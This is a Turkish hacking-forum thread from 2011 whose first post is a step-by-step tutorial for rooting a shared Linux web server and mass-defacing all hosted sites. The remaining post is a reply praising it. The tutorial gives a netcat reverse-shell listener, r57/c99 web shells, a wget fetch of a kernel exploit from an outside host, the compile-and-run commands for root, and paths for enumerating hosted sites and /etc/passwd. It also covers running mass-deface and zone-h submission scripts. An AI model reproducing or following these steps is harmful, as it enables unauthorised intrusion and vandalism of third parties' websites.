İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Linux Root Resimli Anlatım

07-09-2011 23:52
#1
evillord - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Nereden:
Kod aklın di
Mesajlar:
1.576
Teşekkür (Etti):
165
Teşekkür (Aldı):
1077
Konular:
171
Ticaret:
(0) %

Direk Anlatıma geçelim

Öncelikle Root Ne demektir ; Root Olmak bir Sitedeki Mevcut Olan Tüm domain sitelere bir exploit yoluyla aynı anda basmak demektir . atıyorum bi sitenin 2300 alt sunucu olsa bunlara tek tek basmak imkansızdır işte burda root olmak devreye giriyor

malzemeler:
1) netcat (for back connect)
2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur)
3)mass.pl (çoklu deface için indexleyicidir)
4)zone-h.pl (çoklu deface kaydı içindir)
5) special bir index

Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz
karşımıza siyah ms-dos ekranı gelecek bu ekrana
nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım
Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir
açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)
evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz





shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım



evet baglandık serverimiz 2007 sürümü 2.6.22

exploitimizi googledan veya milw0rm dan arayıp bulduktan sonra

serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.22.c
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı
not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)



bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun
id komutuyla kontrol edelim

evet serverimiz rootlandı
whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)
uid=0 ı gorduk
şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz



siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim



önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Legend Coder (nickimi yazdım) yazıp enter diyoruz




alıntıdır.
Kullanıcı İmzası

Bizi eskiler tanır, yeniler örnek alır...

08-09-2011 00:09
#2
D0LCh - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2011
Nereden:
Gasseri
Mesajlar:
515
Teşekkür (Etti):
95
Teşekkür (Aldı):
79
Konular:
37
Ticaret:
(0) %
süper anlatım hocam elin kolun dert görmesin konu sabitlenmeli bence

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı